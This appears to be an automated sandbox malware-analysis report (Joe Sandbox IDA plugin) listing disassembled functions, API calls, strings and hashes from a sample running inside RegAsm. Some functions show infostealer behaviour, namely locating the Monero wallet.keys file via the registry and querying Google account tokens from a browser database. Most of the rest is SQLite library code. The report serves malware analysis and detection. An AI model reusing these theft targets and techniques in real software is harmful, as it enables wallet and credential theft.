Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D

lstrcat.KERNEL32(?,00000000), ref: 00401CB2
lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 00401CBF
lstrcat.KERNEL32(?,.keys), ref: 00401CDA

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 00411805: _EH_prolog.MSVCRT ref: 0041180A
Part of subcall function 00411805: GetSystemTime.KERNEL32(?,00427520,00000001,000000C8,00000000,00427722), ref: 0041184A

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

memset.MSVCRT ref: 00401E9D

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415718: _EH_prolog.MSVCRT ref: 0041571D
Part of subcall function 00415718: CreateThread.KERNEL32(00000000,00000000,00413F49,?,00000000,00000000), ref: 004157C3
Part of subcall function 00415718: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004157CB

Strings

.keys, xrefs: 00401CCE
SOFTWARE\monero-project\monero-core, xrefs: 00401C98
wallet_path, xrefs: 00401C93
\Monero\wallet.keys, xrefs: 00401D03

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$File$AllocCreateHeaplstrlenmemset$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1518627966-218353709
Opcode ID: ebf37eb3169ed77506b114d5349809bc4a1e37d6a056c98b5c8efd31f0ea4fef
Instruction ID: 458fb533019cfbea7bc07f0bbc9555b9ce00988e3e319f809225e39ace9aa4f2
Opcode Fuzzy Hash: ebf37eb3169ed77506b114d5349809bc4a1e37d6a056c98b5c8efd31f0ea4fef
Instruction Fuzzy Hash: 94714F71D00248EADB04EBE5D956BDDBBB8AF14308F14405EE515B3182EFBC1789CB6A

Function 1B3EB980 Relevance: 16.7, APIs: 11, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b37d46f8c9fb5e2f13a643c8f09c9c1e228ddd5055a600dda28889e341382bb3
Instruction ID: 42d52a59efa5a75ef6a17687d48f3522be887fb2d3a97f03363d7cf42077b7dd
Opcode Fuzzy Hash: b37d46f8c9fb5e2f13a643c8f09c9c1e228ddd5055a600dda28889e341382bb3
Instruction Fuzzy Hash: 52814A758083978BDB0B8F2089C17DABBA4AF41204F44076AE8D59721AFB35D9B5C7F1

Function 1B42F600 Relevance: 16.7, APIs: 11, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
Instruction ID: fdc02c06f6793cebcd21b87365f949784a2db59fde30813b5f59d098b8467173
Opcode Fuzzy Hash: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
Instruction Fuzzy Hash: 5C51D676A043016BEB00DE14EC81BAFB7E8EF84714FC0057DF98597241E725BD6997A2

Function 1B451940 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 345COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B451B17
%s at line %d of [%.10s], xrefs: 1B451B26
misuse, xrefs: 1B451B21
block, xrefs: 1B451A90

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$block$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-4016964285
Opcode ID: f69814f87b063a39c8b8be816206369a82e524cb080a5f46d52f7c549eabab1c
Instruction ID: 94b0c996d1c0554bd8aa13d800284b9ec16c32203ca89afdef430c5aa76a344e
Opcode Fuzzy Hash: f69814f87b063a39c8b8be816206369a82e524cb080a5f46d52f7c549eabab1c
Instruction Fuzzy Hash: C4C113B1D007519FDB11CF2AC884ADA77A8FF44715F05862AFC899B301E736E954CB92

Function 00408A07 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 308stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00408A0C

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

lstrlenA.KERNEL32(00000000), ref: 00408C2E

Part of subcall function 00411A16: LocalAlloc.KERNEL32(00000040,?,000000C8,00000001,?,00413DEE,00000000,00000000), ref: 00411A2F

StrStrA.SHLWAPI(00000000,AccountId), ref: 00408C53
lstrlenA.KERNEL32(00000000), ref: 00408D3D
lstrlenA.KERNEL32(00000000), ref: 00408D51

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 00406EF1: _EH_prolog.MSVCRT ref: 00406EF6
Part of subcall function 00406EF1: memcmp.MSVCRT ref: 00406F1C
Part of subcall function 00406EF1: memset.MSVCRT ref: 00406F4B
Part of subcall function 00406EF1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406F80

Strings

GoogleAccounts, xrefs: 00408A3D
GoogleAccounts, xrefs: 00408AC0
SELECT service, encrypted_token FROM token_service, xrefs: 00408BAA
AccountId, xrefs: 00408C4D

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
API String ID: 832884763-1713091031
Opcode ID: 06832288357755dd6c42d1985855e69d03e49a4b8fc9c63aa3437e0fec92e931
Instruction ID: d30d0be68458cdf11972b0d7e7727be7cb1b375c2d5048fd3cb7e2a0d1bf5818
Opcode Fuzzy Hash: 06832288357755dd6c42d1985855e69d03e49a4b8fc9c63aa3437e0fec92e931
Instruction Fuzzy Hash: A0C16131804288EADF05EBE5D956ADDBBB4AF14304F10405EF445B31C2EFB91B88DB6A

Function 1B3FFED0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 257COMMON

Download Yara Rule

Strings

%llu, xrefs: 1B3FFFF7
%llu, xrefs: 1B3FFF3C
another row available, xrefs: 1B400076, 1B400081
unknown error, xrefs: 1B40003E
abort due to ROLLBACK, xrefs: 1B400068
no more rows available, xrefs: 1B40006F

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %llu$%llu$abort due to ROLLBACK$another row available$no more rows available$unknown error
API String ID: 0-1539118790
Opcode ID: 077596823494736456901d9cd00ba004d8793d214a4247cc24351e81a32b8bb2
Instruction ID: 20cfe6349b5edcd7a618deb6180de04af15b50a689d59ccec74ceab0d34c14f8
Opcode Fuzzy Hash: 077596823494736456901d9cd00ba004d8793d214a4247cc24351e81a32b8bb2
Instruction Fuzzy Hash: 1591C671A043049BD704DF18DC94BEAB7E5BB89314F44863DF8899B391DB3AE845CB92

Function 1B5070B0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 227COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B50720D
%s at line %d of [%.10s], xrefs: 1B50721C
misuse, xrefs: 1B507217
orphan index, xrefs: 1B5072C2
API called with finalized prepared statement, xrefs: 1B507201
invalid rootpage, xrefs: 1B50715C, 1B50730E

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid rootpage$misuse$orphan index
API String ID: 0-165706444
Opcode ID: 77c19d3ec1cafd13ac06003114f65dc69cca8e8b87a1997af31e86ce869f08c1
Instruction ID: 22ac6dcc72930d6bd1a849392e22e8421cbdeb3ee602d45cdce1e3e5dd99ff79
Opcode Fuzzy Hash: 77c19d3ec1cafd13ac06003114f65dc69cca8e8b87a1997af31e86ce869f08c1
Instruction Fuzzy Hash: 11615EB9E043826BFB218F20EC81FD77799EF81216F044469FC459A242EB21F554C7B2

Function 1B3F3A50 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 172COMMON

Download Yara Rule

Strings

bad page value, xrefs: 1B3F3BDC
read-only, xrefs: 1B3F3A71
no such schema, xrefs: 1B3F3BEA
cannot insert, xrefs: 1B3F3BF1, 1B3F3C52
bad page number, xrefs: 1B3F3BE3
cannot delete, xrefs: 1B3F3A82

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
API String ID: 0-1499782803
Opcode ID: 57fd93a7c54fb4bf63e4c17d20db3120b113c726643eb6280b18160eeee4e3e9
Instruction ID: a5d79a1e040b956ff8e239949d92d5204f0b1dba701f28e6967e55b7a14a87d2
Opcode Fuzzy Hash: 57fd93a7c54fb4bf63e4c17d20db3120b113c726643eb6280b18160eeee4e3e9
Instruction Fuzzy Hash: 94510476A042008BEB04CF14D8D6FD677E8EF80295F14456EF8498B211EB36ECA5C763

Function 1B50B0E0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 117COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B50B108
%s at line %d of [%.10s], xrefs: 1B50B117
misuse, xrefs: 1B50B112
invalid, xrefs: 1B50B13E
unopened, xrefs: 1B50B145
NULL, xrefs: 1B50B0F4
API call with %s database connection pointer, xrefs: 1B50B0F9

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
API String ID: 0-538076154
Opcode ID: 8a61293a37749329c7de5674cfedfca3574f177083067db40e08316d2ec47793
Instruction ID: 51ef7f4048dd0dfc04e965c25a18496e11cfdd58a14ca7e828bb42d79d229644
Opcode Fuzzy Hash: 8a61293a37749329c7de5674cfedfca3574f177083067db40e08316d2ec47793
Instruction Fuzzy Hash: 18319A75D04745ABFB111F649CC0BDBB7AA9F85229F00092DF8A5E6201EF71FA1583A3

Function 0040ED48 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 100stringmemoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040ED4D
lstrlenA.KERNEL32(?,6CA27FA0,75AA5460,00000000), ref: 0040ED71
strchr.MSVCRT ref: 0040ED83
strchr.MSVCRT ref: 0040EDA7
lstrlenA.KERNEL32(?), ref: 0040EDC5
GetProcessHeap.KERNEL32(00000008,-00000001), ref: 0040EDD2
HeapAlloc.KERNEL32(00000000), ref: 0040EDD9
strcpy_s.MSVCRT ref: 0040EE14

Strings

0123456789ABCDEF, xrefs: 0040ED5B

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrlenstrchr$AllocH_prologProcessstrcpy_s
String ID: 0123456789ABCDEF
API String ID: 1978830238-2554083253
Opcode ID: 1b59e2ce7a8a3ad1ac6fceb8ffcfd44c4f5e321fb8b9106999ae058361648d0d
Instruction ID: 003722f4cc4285acbfeca3351e8b42b8223098cfa3ede16b806b873a23e3733a
Opcode Fuzzy Hash: 1b59e2ce7a8a3ad1ac6fceb8ffcfd44c4f5e321fb8b9106999ae058361648d0d
Instruction Fuzzy Hash: FF31F472600115AFDB04EFAACC95AEF7BA9EF45354F00443AF911EB2D0DB389901CB64

Function 1B42F4B0 Relevance: 15.1, APIs: 10, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
Instruction ID: 28027887710b28a8388449aafd07064afde445090e9c875c408b07a536a1f4b2
Opcode Fuzzy Hash: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
Instruction Fuzzy Hash: 8121B46BD0079276FB02AE20AC02FEF229C5F41215FC48498FE55A2281F735F6A542A3

Function 1B4EFB30 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 324COMMON

Download Yara Rule

Strings

API called with NULL prepared statement, xrefs: 1B4EFB65
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4EFB96
%s at line %d of [%.10s], xrefs: 1B4EFBA5
misuse, xrefs: 1B4EFBA0
API called with finalized prepared statement, xrefs: 1B4EFB7A

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: fccb93e435dba60f832dbba776304ac2092b4355c0f9adfccba45a8aad2de7fc
Instruction ID: 24c355c85ce6d8626e315c5eec4f3b4d93e65d8d9acb981c632d637a01361a85
Opcode Fuzzy Hash: fccb93e435dba60f832dbba776304ac2092b4355c0f9adfccba45a8aad2de7fc
